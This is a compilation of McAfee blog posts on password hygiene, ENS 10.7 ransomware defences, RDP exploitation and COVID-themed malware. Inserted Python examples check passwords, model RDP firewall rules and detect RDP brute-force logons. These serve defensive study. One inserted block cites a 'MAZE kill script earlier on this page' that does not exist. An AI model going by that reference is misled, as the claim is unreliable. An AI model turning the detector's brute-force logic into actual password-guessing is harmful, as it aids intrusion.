These shortcuts are understandable, as it can be challenging to recall so many complex passwords. In fact, a previous McAfee survey stated that 26% of individuals would be willing to give up pampering (manicures, pedicures, massages, etc.) if they never had to remember a password again. Additionally, 34% of respondents are most concerned with the ease of remembering their passwords. 

Potential Security Risks

While convenient, these techniques are not exactly foolproof and can lead to some security concerns. That’s because personalized and simple passwords can put our data a bit more at risk – since hackers can usually find information like birthdays, anniversaries, and pet names online. For instance, that harmless Facebook quiz you were thinking of taking to pass the time can actually reveal your personal information to scammers, allowing them to access your online accounts.  

It’s important users are aware of this risk, but especially as we all navigate working from home. As McAfee’s Raj Samani, Chief Scientist and Fellow, would attest, “Password security is essential, especially with the new normal many organizations and people are facing. Staying aware and educated about proper password hygiene is essential for us to keep our data secure as we are connected more than ever these days.” That starts with forming good password habits. Sorry “baxterthedog1234!” 

Secure Your Online Accounts

In the post-pandemic world, my family, including my young kids, spends 6+ hours online daily. In the last month, my 6-year-old created 10+ online accounts to do her schoolwork and play. In this new reality, we all have the chance to build better password habits for ourselves and teach them to our kids. That doesn’t mean we have to remember 27 completely unique and complex passwords but can instead just adopt a few easy best practices to help keep our credentials safe. Check out the following tips to help secure your online accounts from criminals.  

Use a passphrase

According to ZDNet, the FBI recently found that using a passphrase made up of multiple words in a long string of at least 15 characters is not only more difficult for hackers to crack, but also easier for users to remember. Instead of making a basic password, create a longer passphrase from the lyrics to your favorite song or the ingredients used to make your favorite dish.  

Ensure your passwords are unique

Your password or passphrase should be as unique as the information it’s protecting! If a hacker does manage to guess your password for one of your online accounts, it’s likely that they will check for repeat credentials across multiple sites. By using different passwords or passphrases for your online accounts, you can remain calm and collected knowing that the majority of your data is secure if one of your accounts becomes vulnerable. 

Use a password manager

Take your security to the next level with a password manager or a comprehensive security solution, like McAfee Total Protection, that comes with one. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated? 

Use multi-factor authentication

Two-factor or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification like texting or emailing a secure code to verify your identity. Most popular online sites like Gmail, Dropbox, LinkedIn, Facebook, etc. offer multi-factor authentication and it takes just a few minutes to set it up. This reduces the risk of successful impersonation by criminals. Mind you, authentication methods are also evolving due to advanced technology like biometrics. Perhaps the day will be renamed to World No Password Day in the future. 
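The habits described under Common Password Habits and the first two tips (a passphrase of at least 15 characters, nothing reused) can be turned into a simple checker. The code below is an added example, not from the McAfee post or a McAfee product; the common-password set, the sample profile (name, pet, birthdays) and the "existing passwords" list are constructed, and the date fragments it derives from a birthday are one plausible set, not an exhaustive one.

```python
"""Check a candidate password against the habits described in the post.

Added example, not McAfee code.  It applies the post's own points: a
passphrase of at least 15 characters, no common sequences such as 123456,
no personal details (birthdays, names, pet names) that a profile can leak,
and no reuse across accounts.  Profile and password lists are constructed.
"""
import re

MIN_LENGTH = 15  # the FBI passphrase guidance quoted in the post

# Constructed: a few of the most common passwords and the kind of facts a social profile leaks.
COMMON = {"123456", "123456789", "password", "qwerty", "111111"}
PROFILE = {
    "name": "Baxter Jones",
    "pets": ["Baxter"],
    "birthdays": ["1984-03-07", "2012-11-21"],
}
SEQUENCE = re.compile(r"(?:0123|1234|2345|3456|4567|5678|6789)")


def personal_tokens(profile):
    """Derive strings an attacker could guess from a profile: name parts, pet names, date fragments."""
    tokens = set()
    for part in profile["name"].split():
        tokens.add(part.lower())
    for pet in profile["pets"]:
        tokens.add(pet.lower())
    for date in profile["birthdays"]:
        y, m, d = date.split("-")
        # common ways people write a date inside a password (constructed set)
        tokens.update({y, y[2:] + m + d, d + m + y, m + d + y, d + m, m + d, y + m + d})
    return {t for t in tokens if len(t) >= 3}


def check(password, profile=PROFILE, existing=()):
    """Return a list of problems; an empty list means the password passed every check."""
    problems = []
    low = password.lower()
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if low in COMMON or SEQUENCE.search(low):
        problems.append("contains a common sequence")
    for token in sorted(personal_tokens(profile)):
        if token in low:
            problems.append(f"contains personal detail '{token}'")
    if password in existing:
        problems.append("reused from another account")
    return problems


if __name__ == "__main__":
    for candidate in ("123456", "baxterthedog1234!", "correct horse battery staple"):
        print(repr(candidate), "->", check(candidate) or "ok")
```

The post's own joke password, "baxterthedog1234!", is long enough but fails on both the digit run and the pet's name, which is exactly the kind of detail a Facebook quiz or profile gives away; a four-word passphrase with no personal content passes.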

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post What Does Your Password Say About Your Preferences? appeared first on McAfee Blogs.

Silver linings: Why COVID-19 will encourage a national privacy law

Future generations will judge our response to the COVID-19 pandemic not only by our real-time public health and economic actions, but also by our post-pandemic regulatory choices. One of these choices will be how Congress should address the data privacy question, which is rising to new prominence as we embrace the notion that tech and data are integral to a successful and modern pandemic response.

Once we are on the other side of this critical moment, we must come together as a society, draw from the lessons learned, and create a national privacy standard that balances continued innovation and individual privacy. This is not only possible. It is imperative.

ENS 10.7 Rolls Back the Curtain on Ransomware

Ransomware protection and incident response is a constant battle for IT, security engineers and analysts under normal circumstances, but with the number of people working from home during the COVID-19 pandemic that challenge reaches new heights. How do you ensure an equivalent level of adaptable malware protection on or off the corporate network? How do you enable remote services securely? How long will it take you to recover remote end user systems and data encrypted by ransomware?

As remote workers and IT engineers increasingly use Remote Desktop Protocol (RDP) to access internal resources, attackers are finding more weaknesses to exploit. Attackers are exploiting weak authentication or security controls and even resorting to buying RDP passwords in the underground markets. Exploiting these weaknesses can give an attacker admin access and an easy path to install ransomware or other types of malware, then find their way around the corporate network. To see some examples of how attackers are exploiting RDP weaknesses, check out additional blog posts from McAfee Advanced Threat Research (ATR).

In this blog, we will show how you can leverage Endpoint Security or ENS, McAfee’s Endpoint Protection Platform (EPP), led by some of the new capabilities in ENS 10.7 and MVISION Endpoint Detection and Response (EDR), to do just that.

ENS 10.7, with Threat Prevention, Firewall, Web Control and Adaptive Threat Protection modules backed up by Global Threat Intelligence (GTI) provides adaptable, defense in depth capability against the techniques used in targeted ransomware attacks. For more examples of these techniques, see McAfee ATR’s recent blog on LockBit. Pairing ENS 10.7 with MVISION EDR gives the SOC analysts a powerful toolset to quickly identify attempts to steal credentials and lateral move further into the network.

Finally, McAfee ePolicy Orchestrator (ePO) provides a central management console for endpoint security policy, event collection and reporting on your protected systems on or off the corporate network. Let’s explore some of the key defensive steps you can take to lower your risk against targeted ransomware.

Prevent Initial Access with Threat Prevention

The Endpoint Security Threat Prevention module contains several capabilities including signature scanning and exploit prevention through behavior blocking and reputation analysis, to prevent an attacker gaining access to the system. The first step is to ensure you have the minimum level of security in place. This includes following best practice for on-access and on-demand scanning policies, up to date DAT Files and Engine, and Exploit Prevention content, as well as Global Threat Intelligence access enabled. Targeted ransomware attacks may also leverage file-less exploit techniques which could bypass file-based signature scans and reputation checks. Exploit Prevention rules can be configured to either log or block PowerShell behavior.

However, PowerShell is a legitimate system administration tool and we recommend a period of observation and testing before setting any of these rules to block. For some best practice, you can review this guide as a starting point or check with support for the latest documents.

Restrict RDP as an Initial Attack Vector with Endpoint Security Firewall

If RDP is needed to access internal resources on a server or to troubleshoot a remote system, the best practice is to restrict access to the service using a firewall. This will prevent attackers from leveraging RDP as the initial access vector. ENS 10.7 contains a stateful firewall fully managed via McAfee ePolicy Orchestrator (ePO). You can create policies to restrict RDP access to a remote client to only authorized IP addresses, restrict outbound usage to prevent lateral movement by RDP or block access to that port altogether. Here is an example configuration to restrict inbound access to a remote system on RDP.

  1. Open your Firewall Rules policy and locate the default rule under Network Tools.
  2. If you are using a non-standard port for RDP, adjust the local port for this rule appropriately.
  3. Modify the rule by adding authorized IP addresses as remote networks (these are the remote addresses authorized to connect to your endpoints).
  4. Save the changes and apply the policy to endpoints to restrict RDP access.

For additional security, create an identical rule but set to block rather than allow, position it below the above rule, and remove the remote IP addresses (so that it applies to all RDP connections not matching the above rule).

  5. Set this rule as an intrusion so that it logs all denied events and forwards them to ePO.

Security analysts in the SOC can then monitor and report on unauthorized access attempts through ePO dashboards. The event logs are useful for early warning, trend analysis and for threat detection and response.
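The two-rule pattern above (an allow rule limited to authorized remote networks, then a block rule below it that logs everything else as an intrusion) depends entirely on first-match ordering. The following model is an added example, not McAfee ENS code or its policy format; it evaluates a rule table in the same order and shows what the denied-event log would contain, and what happens if the two rules are swapped. The networks, ports and sample connections are constructed, and the fall-through default allow is an assumption of the model, not a statement about ENS defaults.

```python
"""First-match evaluation of the RDP allow/block rule pair described above.

Added example, not McAfee code: models the ordering logic of the steps so
the effect of rule order and of the remote-network list can be reasoned
about before a policy is pushed.  All networks and connections are constructed.
"""
import ipaddress

RDP_PORT = 3389  # adjust if RDP runs on a non-standard port (step 2 above)

# Constructed rule table in policy order.  'remote' lists the authorised remote
# networks; None means the rule matches any remote address.
RULES = [
    {"name": "Allow RDP from admin nets", "action": "allow", "port": RDP_PORT,
     "remote": ["10.10.0.0/24", "192.168.50.5/32"], "log": False},
    {"name": "Block RDP (intrusion)", "action": "block", "port": RDP_PORT,
     "remote": None, "log": True},
]

# Constructed inbound connection attempts as (source IP, local port).
SAMPLE_CONNECTIONS = [
    ("10.10.0.7", 3389),      # authorised admin subnet
    ("203.0.113.9", 3389),    # unknown external source
    ("192.168.50.5", 3389),   # the single authorised host
    ("192.168.50.6", 3389),   # neighbour of that host, not authorised
    ("203.0.113.9", 443),     # not RDP, neither rule applies
]


def rule_matches(rule, src_ip, dst_port):
    """True when the local port matches and the source falls in one of the rule's remote networks."""
    if rule["port"] != dst_port:
        return False
    if rule["remote"] is None:
        return True
    ip = ipaddress.ip_address(src_ip)
    return any(ip in ipaddress.ip_network(net) for net in rule["remote"])


def evaluate(rules, src_ip, dst_port):
    """First match wins; return (action, rule name, logged).  No match falls through to a
    default allow here (an assumption of this model, not of the product)."""
    for rule in rules:
        if rule_matches(rule, src_ip, dst_port):
            return rule["action"], rule["name"], rule["log"]
    return "allow", "default", False


def replay(rules, connections):
    """Run a batch of connections; return the denied-event log as (source IP, rule name) tuples."""
    events = []
    for src, port in connections:
        action, name, logged = evaluate(rules, src, port)
        if action == "block" and logged:
            events.append((src, name))
    return events


if __name__ == "__main__":
    print("denied events:", replay(RULES, SAMPLE_CONNECTIONS))
    # Swapping the two rules puts the catch-all block first and locks out the admins too.
    print("admin host with rules reversed:", evaluate(list(reversed(RULES)), "10.10.0.7", 3389))
```

The reversed-order case is the misconfiguration the steps guard against: with the catch-all block above the allow rule, the allow rule can never match and authorized administrators are denied along with everyone else.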

You can find more information on Endpoint Security firewall features here.

Prevent Access to Malicious Websites with Web Control

Attackers often leverage watering holes and spear phishing with links to malicious sites to gain initial access or further infiltrate the network. When a user is on the corporate network, they are often behind a Web Proxy like McAfee Web Gateway. However, many of your mobile clients are going direct to the internet and not through the corporate VPN. This creates more exposure to web-based threats. The Endpoint Security Web Control module monitors web searching and browsing activity on client computers and protects against threats on webpages and in file downloads.

You use McAfee ePO to deploy and manage Web Control on client systems. Settings control access to sites based on their safety rating, reputation from Global Threat Intelligence, the type of content they contain, and their URL or domain name. The configuration settings allow you to adjust sensitivity to be more or less restrictive based on your risk appetite.

If you are a McAfee Web Gateway or Web Gateway Cloud Service customer, you should use McAfee Client Proxy (MCP). MCP works with Web Control to route traffic to the right proxy and provide a defense in depth capability for web protection for users on or off the corporate network.

The above are just a few examples of using Endpoint Security Threat Prevention, Web Control and Firewall to restrict initial attack vectors. To learn more about Endpoint Security best practice to restrict initial entry vectors, visit here.

Let’s look at a few more important steps to protect systems against targeted ransomware.

Lockdown the Security Crown Jewels

If an attacker gets on the system through RDP, stolen accounts or a vulnerability, they may try to modify, delete or disable security software. In ePO, you should ensure that Self Protection is ON to prevent McAfee services and files on the endpoint or server system from being stopped or modified.

Ensure that ENS is configured to require a password for uninstallation.

 

Security analysts should be on high alert for any system that has Self Protection disabled. ePO contains a default query entitled Endpoint Security: Self Protection Compliance Status which can be used to populate a continuous monitoring dashboard or be packaged into a daily report.

Disrupt and Visualize Attacker Behavior with Adaptive Threat Protection (ATP)

ATP adds several more capabilities, such as machine-learning, threat intelligence, script-scanning and application behavior analysis, to disrupt targeted attack techniques including file-based or file-less attacks.

ATP identifies threats by observing suspicious behaviors and activities. When ATP determines that the context of an execution is malicious, it blocks the malicious activity, and if necessary, remediates (see Enhanced Remediation section below). How does this work? The Real Protect scanner inspects suspicious activities on client systems and uses machine-learning techniques to detect malicious patterns. The Real Protect scanner can scan a network-streamed script, determine if it is malicious, and if necessary, stop the script. Real Protect script scanning integrates with AMSI to protect against non-browser-based scripts, such as PowerShell, JavaScript, and VBScript.

For more information on how ATP remediates threats please review the product guide here.

One of the newest features of ENS 10.7 is the Story Graph. The Story Graph provides a visual representation of threat detections. Below is an example from a simulated file-less attack scenario where a Word document, delivered through spear-phishing, leverages a macro and PowerShell to provide command and control, then elevate privileges and perform lateral movement.

The visualization provides a timeline analysis and context around the event. It correctly captured the attack behavior including the communication to an external attacker IP address. With this visualization, an administrator or security analyst can quickly determine malicious behavior was stopped by ATP, preventing the follow-up activity intended by the attacker. The additional context, such as the originating process and a download IP address, can then be used for further investigations using other log sources, for example. It is important to note that in this example, if the Threat Prevention module as described above was set to block all PowerShell behavior, this attack would have been stopped earlier in the chain. Please read further to see what this attack scenario looks like in MVISION EDR.

For more information on how ATP protects against file-less attacks visit here.

Using a Word document and PowerShell is just one example of masquerading attacks in common files. For more examples of these techniques, see the ATR blog on LockBit ransomware.

ATP Brings Automatic File Recovery with Enhanced Remediation

If you have ever seen a ransom note, like the one from Wanna Decryptor below, you will know how big an issue it can be. It will cost you time, money and most likely lead to loss of data.

If this happens on a remote user system, it will lead to extended downtime, frustrated users and present significant challenges for recovery.

One of the new capabilities in ENS 10.7 is Enhanced Remediation. This feature monitors any process with an unknown reputation and backs up changes made by those processes. If the processes exhibit malicious behavior as determined by machine-learning analysis and reputation, enhanced remediation automatically rolls back those changes made to the system and documents to a previous state.

You can see how files impacted by ransomware can be restored through Enhanced Remediation in this video.

Enhanced Remediation requires that ATP is enabled and policies for Dynamic Application Containment are configured. Real Protect Dynamic scanning must also be enabled on the system. Real Protect Dynamic leverages machine learning in the cloud to identify suspicious behavior and is needed to determine a file reputation which is used to trigger an enhanced remediation action.

For information on how to configure ATP, please review the product guide here. For more best practices on tuning Dynamic Application Containment rules, please review the knowledge base article here.

Once policies are established, ensure that you enable “Enhanced Remediation” and “Monitor and remediate deleted and changed files”.

If a file is convicted by Real Protect Dynamic and Enhanced Remediation is enabled with the settings above, then recovery happens automatically. The setting “Monitor and remediate deleted or changed files” must be enabled to ensure any files modified by the ransomware are restored to the previous state.

For more information on how Enhanced Remediation works, please review the product guide here.

Continuous Monitoring with ePO Protection Workspace

Now that you have protection controls in place with Threat Prevention and Adaptive Threat Protection, you can monitor using the Compliance Dashboard in ePO to ensure all managed clients stay up to date.

In addition, events triggered by ATP can be sent to ePO. SOC analysts should monitor these events and use the Story Graph as well for additional investigative capability. For more information on reporting and querying events in ePO, please review the product guide here.

Proactive Monitoring and Hunting with MVISION EDR

One of the first questions a threat hunter needs to answer when a new threat is discovered is “are we exposed?” For example, you may have a policy that already prohibits or restricts RDP but how do you know it is enforced on every endpoint? With MVISION EDR, you can perform a real time search across all managed systems to see what is happening right now. The screenshot below shows a Real-time Search to verify if RDP is enabled or disabled on a system. This provides a view into systems potentially at risk and can also be useful context as part of an investigation.

Real-time Search can also identify systems with active connections on RDP…

MVISION EDR also maintains a history of network connections inbound and outbound from the client. Performing an historical search for network traffic could identify systems that actively communicated on port 3389 to unauthorized addresses, potentially detecting attempts at exploitation.
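The "are we exposed?" question in the two paragraphs above (is RDP enabled, is the port listening, has it talked to addresses it should not) can be answered from per-host records once the EDR search results are exported. The triage below is an added example and is not MVISION EDR code or its query language; the record layout and the hosts are constructed. It checks the same fDenyTSConnections value the MAZE kill script earlier on this page sets to 0, and classifies RDP peers as internal or external by explicit RFC 1918 membership rather than Python's `is_private`, which would also treat the documentation address used here as private.

```python
"""Triage RDP exposure from EDR-style per-host records.

Added example, not MVISION EDR code.  For each constructed host record it
reports whether RDP is enabled (fDenyTSConnections == 0), whether 3389 is
listening, and whether the connection history shows RDP traffic with peers
outside RFC 1918 space.
"""
import ipaddress

RDP_PORT = 3389
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed records; "connections" are (direction, peer IP, local port) from the host's history.
HOSTS = [
    {"host": "WS-014", "fDenyTSConnections": 0, "listening": [3389, 445],
     "connections": [("in", "10.10.0.7", 3389), ("in", "203.0.113.9", 3389)]},
    {"host": "WS-022", "fDenyTSConnections": 1, "listening": [445],
     "connections": [("out", "198.51.100.20", 443)]},
    {"host": "SRV-01", "fDenyTSConnections": 0, "listening": [3389],
     "connections": [("in", "10.10.0.7", 3389)]},
]


def is_internal(ip):
    """Explicit RFC 1918 check; ipaddress.is_private would also flag 203.0.113.0/24 as private."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def rdp_enabled(record):
    """RDP is enabled when fDenyTSConnections is 0 (the value the kill script above writes)."""
    return record.get("fDenyTSConnections") == 0


def external_rdp_peers(record):
    """Peers that exchanged traffic on port 3389 and are outside the internal ranges."""
    peers = {peer for _d, peer, port in record["connections"]
             if port == RDP_PORT and not is_internal(peer)}
    return sorted(peers)


def triage(records):
    """Return [(host, level, reason)] for hosts with RDP enabled, worst first."""
    out = []
    for r in records:
        if not rdp_enabled(r):
            continue
        ext = external_rdp_peers(r)
        if ext:
            out.append((r["host"], "high", "RDP enabled, external peers: " + ", ".join(ext)))
        elif RDP_PORT in r["listening"]:
            out.append((r["host"], "medium", "RDP enabled and listening, internal peers only"))
        else:
            out.append((r["host"], "low", "RDP enabled but not listening"))
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(out, key=lambda t: (order[t[1]], t[0]))


if __name__ == "__main__":
    for host, level, reason in triage(HOSTS):
        print(f"{level:6} {host}: {reason}")
```

A host where the policy says RDP is off but the record says fDenyTSConnections is 0 is the enforcement gap the paragraph describes; the external-peer check is the historical search for port 3389 traffic to unauthorized addresses, reduced to a per-host list.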

For a security analyst, EDR provides several benefits to accelerate threat detection and response. For more information on those benefits please review the product guide here. In our simulated file-less attack scenario described above, the story graph revealed a PowerShell connection to an external IP address. Suppose an alert ePO administrator created a ticket for further investigation. A first step by the analyst might be a search for the network activity.

Real-time Search in EDR of that network activity looks like this…

An historical search for the same PowerShell activity in EDR now reveals the encoded commands used in the initial entry vector…

EDR also enables proactive monitoring by a security analyst. The Monitoring Dashboard helps the analyst in the SOC quickly triage suspicious behavior. In this case, the attack leveraged Word and PowerShell to gain access and raise privileges. The attack scenario triggered a number of high threats and provides a lot of context for the analyst to make a quick determination that an attack has been attempted, requiring further action…

Our research into targeted ransomware attacks reveals that if an attacker successfully exploits a client, their next actions involve privilege escalation and lateral movement (see our blog on LockBit). Again, you can use MVISION EDR to quickly detect these techniques.

The Alerting Dashboard in EDR will help you quickly identify attempts at privilege escalation and other attack techniques as defined by the MITRE ATT&CK framework.

Lateral movement is usually the next step and that can involve many different techniques. Again, the Alerting Dashboard identifies lateral movement techniques with details into the specific activity that triggered the alert.

Conclusion

Ransomware and RDP are a dangerous combination. Protecting your remote end users requires a good, secure baseline configuration of Endpoint Security with a Firewall and Self Protection enabled and access to adaptable capability such as Adaptive Threat Protection with Enhanced Remediation. The Enhanced Remediation feature is only available starting in version ENS 10.7, so if you are running older versions of ENS or even VSE (yikes), then it is time to upgrade.

However, stopping targeted ransomware from having an impact on the business requires more than prevention. Both ePO and EDR provide the capability for proactive detection, faster investigations and continuous hunting.

Finally, adaptability requires threat intelligence. McAfee Advanced Threat Researchers and Labs are actively monitoring the threat landscape and continuously updating McAfee Global Threat Intelligence systems. Make sure your Endpoint Security and other McAfee products are using GTI for the latest protection.

For more information on targeted ransomware attacks and techniques, see ATR Blog.

For more details about how to secure RDP access in general, you can refer to a previous McAfee blog.

The post ENS 10.7 Rolls Back the Curtain on Ransomware appeared first on McAfee Blogs.

Cybercriminals Actively Exploiting RDP to Target Remote Organizations

The COVID-19 pandemic has prompted many companies to enable their employees to work remotely and, in a large number of cases, on a global scale. A key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP), which allows communication with a remote system. In order to maintain business continuity, it is very likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to enter them with ease.

RDP is a Microsoft protocol running on port 3389 that can be utilized by users requiring remote access to internal systems. Most of the time, RDP is enabled on Windows servers, which also host services such as web servers or file servers. In some cases, it is also connected to industrial control systems.

RDP ports are often exposed to the Internet, which makes them particularly interesting for attackers. In fact, accessing an RDP box can allow an attacker access to an entire network, which can generally be used as an entry point for spreading malware, or other criminal activities.

As it can be such a powerful entry vector, McAfee Advanced Threat Research (ATR) has observed many underground markets emerge, offering RDP credentials at relatively low cost. For example, McAfee ATR uncovered access linked to a major international airport that could be bought for only US$10. Since March 2020, the number of exposed RDP ports has increased considerably.

McAfee Advanced Threat Research and the security industry have been aware of the risk of exposed RDP for many years and will continue to raise awareness as part of our global threat monitoring.

In this blog, we will discuss the risks of exposing the RDP protocol and the associated misconfigurations.

RDP Statistics

The number of RDP ports exposed to the Internet has grown quickly, from roughly three million in January 2020 to more than four and a half million in March. A simple search on Shodan reveals the number of RDP ports exposed to the Internet by country.

It is interesting to note that the number of RDP systems exposed is much higher for China and the United States.

Most of the compromised systems using RDP are running Windows Server but we also notice other operating systems, such as Windows 7.

For attackers, access to a remote system can allow them to perform several criminal actions such as:

  • Spreading spam: Using a legitimate system for sending spam is very convenient. Some systems are sold especially for this purpose.
  • Spreading malware: A compromised system provides a ready-to-use machine for easily distributing malware, or even pivoting to the internal network. Many ransomware authors use this vector to target organizations around the world. Another criminal option would be to implant a cryptominer.
  • Using the compromised box as their own: Cybercriminals also use remotely compromised systems to hide their tracks by, for example, compiling their tools on the machine.
  • Abuse: The remote system can also be used to carry out additional fraud such as identity theft or the collection of personal information.

This recent increase in the number of systems using RDP over the Internet has also influenced the underground. McAfee ATR has noticed an increase in both the number of attacks against RDP ports and in the volume of RDP credentials sold on underground markets.

As observed on Shodan, the number of exposed systems is higher for China (37% of the total) and the United States (37% of the total), so it is interesting to note that the number of stolen RDP credentials from the US offered for sale (4% of the total) is comparatively much lower than for other nations. We believe this may be because the actors behind the market sometimes hold back RDP credentials without publishing their whole list.

How are Attackers Breaching Remote Systems?

Weak passwords remain one of the common points of entry. Attackers can easily use brute force attacks to gain access. In the image below we see the 20 most used passwords in RDP. We built this list from information on weak passwords shared by a friendly law enforcement agency, taken from RDP shops that had been taken down.

The diagram below demonstrates the number of compromised systems using the top 10 passwords. What is most shocking is the large number of vulnerable RDP systems that did not even have a password.

The RDP protocol also suffers from vulnerabilities and needs patching. Last year, we explained in detail the workings of the BlueKeep vulnerability that affects reserved channel 31, which is part of the protocol functionality, to allow remote code execution.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/

In early January, additional flaws related to Remote Desktop Gateway were also patched:

These two vulnerabilities are similar to the BlueKeep vulnerability and allow remote code execution by sending a specially crafted request. We have not yet observed these vulnerabilities exploited in the wild.

To secure the RDP protocol, the following checklist can be a good starting point:

  • Do not allow RDP connections over the open Internet
  • Use complex passwords as well as multi-factor authentication
  • Lock out users and block or timeout IPs that have too many failed logon attempts
  • Use an RDP gateway
  • Limit Domain Admin account access
  • Minimize the number of local admins
  • Use a firewall to restrict access
  • Enable restricted Admin mode
  • Enable Network Level Authentication (NLA)
  • Ensure that local administrator accounts are unique and restrict the users who can logon using RDP
  • Consider placement within the network
  • Consider using an account-naming convention that does not reveal organizational information
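The checklist item about locking out users and blocking IPs with too many failed logon attempts, together with the brute-force findings above, can be operationalised from the Windows Security log. The following is an added example, not code from the McAfee post: a Python detector over constructed 4625/4624 records that flags an RDP password-guessing source and notes when one of its guesses succeeded. IP addresses, user names and timestamps are constructed.

```python
"""Detect RDP password guessing from Windows Security log events.

Added example, not part of the McAfee post. Events are constructed dicts
carrying the fields of Security event 4625 (failed logon) and 4624
(successful logon) that matter here: EventID, TimeCreated, LogonType,
IpAddress and TargetUserName. Logon type 10 (RemoteInteractive) is what
an RDP session produces, so other logon types are ignored.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10
WINDOW = timedelta(minutes=5)
THRESHOLD = 10          # failed RDP logons from one IP inside WINDOW


def detect_rdp_bruteforce(events, window=WINDOW, threshold=THRESHOLD):
    """Return {ip: finding} for each source IP whose failed RDP logons reach
    `threshold` inside `window`. A finding holds the running failure count,
    the user names tried and, if a successful RDP logon from that IP lands
    while the burst is still inside the window, compromised=True plus the
    account that got in."""
    recent = defaultdict(deque)   # ip -> failure timestamps still in window
    total = defaultdict(int)      # ip -> failures seen overall
    tried = defaultdict(set)      # ip -> user names attempted
    findings = {}
    for e in sorted(events, key=lambda ev: ev["TimeCreated"]):
        if e.get("LogonType") != RDP_LOGON_TYPE:
            continue
        ip, t = e["IpAddress"], e["TimeCreated"]
        q = recent[ip]
        while q and t - q[0] > window:        # age out old failures
            q.popleft()
        if e["EventID"] == 4625:
            q.append(t)
            total[ip] += 1
            tried[ip].add(e["TargetUserName"])
            if len(q) >= threshold:
                f = findings.setdefault(ip, {"compromised": False,
                                             "success_user": None})
                f["failures"], f["users"] = total[ip], tried[ip]
        elif e["EventID"] == 4624 and ip in findings and q:
            # a success while failures are still in the window: a guess worked
            findings[ip]["compromised"] = True
            findings[ip]["success_user"] = e["TargetUserName"]
    return findings


def respond(findings):
    """Map findings onto the checklist actions: block the source, and reset
    any account that was reached after the burst."""
    actions = []
    for ip, f in findings.items():
        actions.append(f"block {ip} at the firewall or RDP gateway "
                       f"({f['failures']} failed RDP logons, "
                       f"{len(f['users'])} accounts tried)")
        if f["compromised"]:
            actions.append(f"reset {f['success_user']} and review its RDP "
                           f"sessions: successful logon from {ip} after the burst")
    return actions


BASE = datetime(2020, 5, 1, 9, 0, 0)   # constructed timestamp origin


def _event(event_id, offset_s, ip, user, logon_type=RDP_LOGON_TYPE):
    return {"EventID": event_id, "TimeCreated": BASE + timedelta(seconds=offset_s),
            "LogonType": logon_type, "IpAddress": ip, "TargetUserName": user}


# Constructed sample: one guessing source that eventually gets in, one user
# who mistyped twice, and a noisy SMB (logon type 3) source that this rule
# deliberately ignores.
SAMPLE_EVENTS = (
    [_event(4625, 10 * i, "203.0.113.7", u)
     for i, u in enumerate(["administrator", "admin", "user", "test"] * 3)]
    + [_event(4624, 125, "203.0.113.7", "administrator")]
    + [_event(4625, 30, "192.0.2.5", "jsmith"),
       _event(4625, 40, "192.0.2.5", "jsmith"),
       _event(4624, 50, "192.0.2.5", "jsmith")]
    + [_event(4625, 5 * i, "198.51.100.9", "svc_backup", logon_type=3)
       for i in range(20)]
)

if __name__ == "__main__":
    for line in respond(detect_rdp_bruteforce(SAMPLE_EVENTS)):
        print(line)
```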

For more details about how to secure RDP access, you can refer to our previous blog (https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rdp-security-explained/)

Conclusion

As we discussed, RDP remains one of the most used vectors to breach into organizations. For attackers, it is a simple way to quickly carry out malicious activities such as spreading malware or spam, or other types of crime.

There is currently a whole business around RDP on the underground market and the current situation has amplified this behavior. To stay protected, it is essential to follow best security practices, starting with the basics, such as using strong passwords and patching vulnerabilities.

McAfee ATR is actively monitoring threats and will continue to update you on this blog and its social networking channels.

The post Cybercriminals Actively Exploiting RDP to Target Remote Organizations appeared first on McAfee Blogs.

McAfee Surveys Cyber-Threats in the Age of Coronavirus

Change is a constant in technology, and the greatest changes are often driven by major events that fundamentally reshape how people work and conduct business. In the Age of Coronavirus, more than ever, technology and cybersecurity must keep pace with disruption and change, adapt to adversity, and even accelerate their development wherever possible.

The enormous increase in remote work over the last couple of months has placed new pressure on organizations to ensure that employees working from home can access corporate resources from outside corporate-controlled offices and infrastructure. Simultaneously, cybercriminals are seeking to gain from the strain this places on technologies, business procedures, and processes. A critical and effective vector for these adversaries is exploiting the health and economic concerns created by the pandemic.

This week, McAfee Labs released a report entitled COVID-19: Malware Makes Hay During a Pandemic to highlight the last few months of pandemic-themed threat landscape activity. The threats typically leverage a phishing email delivery method, with Coronavirus themes and messages developed to lure employees and family members into engaging with and enabling threats to gain a foothold on their systems.

Once established, that foothold can allow cyber adversaries to download malware used to steal corporate usernames, passwords and data, monitor employee activity, capture user keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. They can impersonate their victim, sending emails from the infected machine to propagate themselves to numerous other systems. In the case of ransomware, they can encrypt system files and refuse to decrypt them until the victim sends a ransom payment.

Below is a summary of some of the cyber threats McAfee has observed since the COVID pandemic has emerged:

Phishing and Trojans: In January, McAfee observed the emergence of a phishing campaign using a strain of the Ursnif banking Trojan commonly used to steal usernames, passwords and user behavior information. As bait, the phishing emails used pandemic-themed messaging and a Microsoft Office document with “COVID-19” in its filename to lure users into opening the attachment and releasing the malware onto their computers.

Beginning in February, McAfee observed another campaign leveraging phishing emails referencing the terms “COVID-19” and “Coronavirus” to entice users to click on links or attachments that then downloaded the information-stealing Fareit Trojan onto their computers.

Example Fareit Emails:

Bogus SBA Loan Emails: Beginning in late March, a phishing campaign used emails claiming to originate from the U.S. Government Small Business Administration (SBA). These emails appeared to offer small businesses information and guidance on how to apply for SBA loans. In fact, they were a mechanism for infecting unsuspecting small business owners with the information-stealing Remcos Remote Access Tool (RAT).

